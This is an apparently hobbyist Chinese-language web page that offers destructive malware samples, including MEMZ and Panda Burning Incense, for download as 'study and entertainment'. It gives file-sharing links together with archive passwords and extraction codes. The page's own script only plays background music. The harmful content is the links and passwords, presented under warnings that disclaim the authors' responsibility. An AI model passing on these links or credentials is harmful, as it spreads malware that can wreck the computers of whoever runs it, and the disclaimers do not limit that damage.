<html>
<head>
    <head>
        <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
        <title>寒坤的病毒库</title>
        <link rel="icon" href="!.png" type="image/x-icon">
        <Link Rel="SHORTCUT ICON" href="./ICO.ico">
        <style>

            #canvas {
                position: absolute;
                z-index: 10;
                top: 0;
                left: 0;
                bottom: 0;
                right: 0;
                cursor: none;
            }

            .content {
                position: absolute;
                z-index: 11;
                right: 0;
                left: 0;
                top: 0;
                bottom: 0;
            }

            .splash {
                position: relative;
            }

            img#qq {
                width: 128px;
                background-size: cover;
                border-radius: 200px;
                box-shadow: 0px 0px 40px rgba(63, 81, 181, 0.72);
                border: 3px solid #00a0ff;
                opacity: 1;
                margin: 0 auto;
                margin-bottom: 20px;
                transition: all 1.0s;
            }

            #qq:hover {
                box-shadow: 0 0 10px #fff;
                -webkit-box-shadow: 0 0 19px #fff;
                transform: rotate(360deg);
                -ms-transform: rotate(360deg); /* IE 9 */
                -moz-transform: rotate(360deg); /* Firefox */
                -webkit-transform: rotate(360deg); /* Safari 和 Chrome */
                -o-transform: rotate(360deg); /* Opera */
                filter: progid:DXImageTransform.Microsoft.BasicImage(rotation=3);
            }

            a {
                text-decoration: none;
                color: #7151a9;
            }

            .bod {
                background-color: #0041c6;
            }
        </style>


    </head>

<body background="./233.jpg"
          style=" background-repeat:no-repeat ;
        background-size:100% 100%;
        background-attachment: fixed;">
    <div class="jumbotron">
        <div class="container">
            <div class="splash">
                <div class="content">
                    <center>
                        <img src="./LOGO.png" tppabs="" alt="PatternFly logo" id="qq" class="wow fadeInDown animated"
                             style="visibility: visible; animation-name: fadeInDown;">
                    </center>
                    <center><img src="./!.png" width="128" height="128"><img src="./000.png"><img src="./!.png" width="128" height="128"></center>
                    <center><font size="5" color="#FF0000" class="bod">警告：这个页面下载的文件将会威胁你的计算机安全，这些病毒只作为学习研究和娱乐观赏所用，严禁用于恶意破坏，运行这些病毒造成的一切后果由运行者承担！严禁未经作者本人同意擅自传播这些病毒样本，造成后果也同样由传播者承担！</font></center>
                    <center><font size="6" color="#FF0000" class="bod">网页作者（QQ短视频:我的世界_寒坤(就是我)）和病毒作者（QQ短视频:我的世界_寒坤(就是我)和GTX690战术核显卡导弹）将不会承担任何责任！！！包括法律责任！！！</font></center>
                    <center><font size="5" color="#FF0000" class="bod">如果你进行下载，则你已阅读和同意警告的内容！如果你不同意，请关闭本网页！</font></center>
                    <center><font size="6" color="#FF0000" class="bod">下面是病毒文件!!!（已经弄成压缩包，解压密码均为ziyit或者没有密码，提取码ztpc或没有）</font></center>
                    <script>alert("警告！此页面下载的是病毒，请仔细阅读警告文本！ ")</script>
                    <br>
                    <br>
                    <br>
                    <center><font size="6" color="#FF0000"><a href="https://www.123912.com/s/C4A7Td-Itfg3提取码:ztpc">蔡徐坤病毒2.1(作者:GTX690，法律承担者:你)</a></font></center>
                    <center><font size="6" color="#FF0000"><a href="https://www.123865.com/s/C4A7Td-Itfg3提取码:ztpc">蔡徐坤病毒2.1(作者:GTX690，法律承担者:你；备用链接)</a></font></center>
                    <center><font size="6" color="#FF0000"><a href="https://wwcy.lanzouq.com/ilvH72tykjte">horror和Windows Update(作者:我的世界寒坤，法律承担者:你)</a></font></center>
                    <center><font size="6" color="#FF0000"><a href="https://wwcy.lanzouq.com/iMgwZ2tykjuf">MEMZ(作者:我的世界寒坤，法律承担者:你；备用链接)</a></font></center>
                    <center><font size="6" color="#FF0000"><a href="https://wwcy.lanzouq.com/iEczl2tyknba">母牛屎界(作者:我的世界寒坤，法律承担者:你；备用链接)</a></font></center>
                    <center><font size="6" color="#FF0000"><a href="https://wwcy.lanzouq.com/iqp2t2tykndc">熊猫烧香(作者:我的世界寒坤，法律承担者:你；备用链接)</a></font></center>
                    <br>
                    <br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br>
                </div>
            </div>
        </div>
    </div>
    <audio src="bm.mp3" style="display: none;"></audio>
    <script>
        // 第二事件：循环播放背景音乐
        // 控制音乐播放状态的变量
        let isPlay = false; 
        // 获取音频元素
        const audio = document.querySelector('audio'); 
        // 修改背景音乐列表，添加新的音乐文件
        const bgmList = ['bm.mp3', 'bm2.mp3', 'bm3.mp3', 'bm4.mp3'];
        
        // 随机选择一首背景音乐
        function selectRandomBgm() {
            const randomIndex = Math.floor(Math.random() * bgmList.length);
            return bgmList[randomIndex];
        }

        // 设置音频循环播放
        audio.loop = false; // 关闭原生循环，使用自定义循环

        // 音频播放结束事件监听器
        audio.addEventListener('ended', () => {
            audio.src = selectRandomBgm();
            if (isPlay) {
                audio.play().catch((error) => {
                    console.error('切换播放音频失败:', error);
                });
            }
        });
        
        // 定义处理首次交互播放音频的函数
        const startAudioOnFirstInteraction = () => {
            audio.src = selectRandomBgm(); // 首次播放随机选择一首
            audio.play()
              .then(() => {
                    isPlay = true;
                    // 定义交互事件数组
                    const events = ['click', 'touchstart', 'keydown', 'mousedown'];
                    // 移除 document 上的交互事件监听器
                    events.forEach((event) => {
                        document.removeEventListener(event, startAudioOnFirstInteraction);
                    });
                })
              .catch((error) => {
                    console.error('播放音频失败:', error);
                });
        };

        // 监听用户交互事件
        const interactionEvents = ['click', 'touchstart', 'keydown', 'mousedown'];
        interactionEvents.forEach((event) => {
            document.addEventListener(event, startAudioOnFirstInteraction);
        });

        // 为音频元素添加点击事件监听器，用于切换播放和暂停状态
        audio.addEventListener('click', () => {
            if (isPlay) {
                audio.pause();
                isPlay = false;
            } else {
                audio.play()
                  .then(() => {
                        isPlay = true;
                    })
                  .catch((error) => {
                        console.error('切换播放音频失败:', error);
                    });
            }
        });
        
        // 调用切换轮播图的函数
        toggle();
    </script>
    <br><br><br><br><br><br><br><br><br><br><br><br><br>
    <p class="tit">&copy;2024 ZIYIT <strong>版权所有，侵权必究</strong></p>
    <script>
        console.log('The html is reding')
    </script>
</body>
</html>
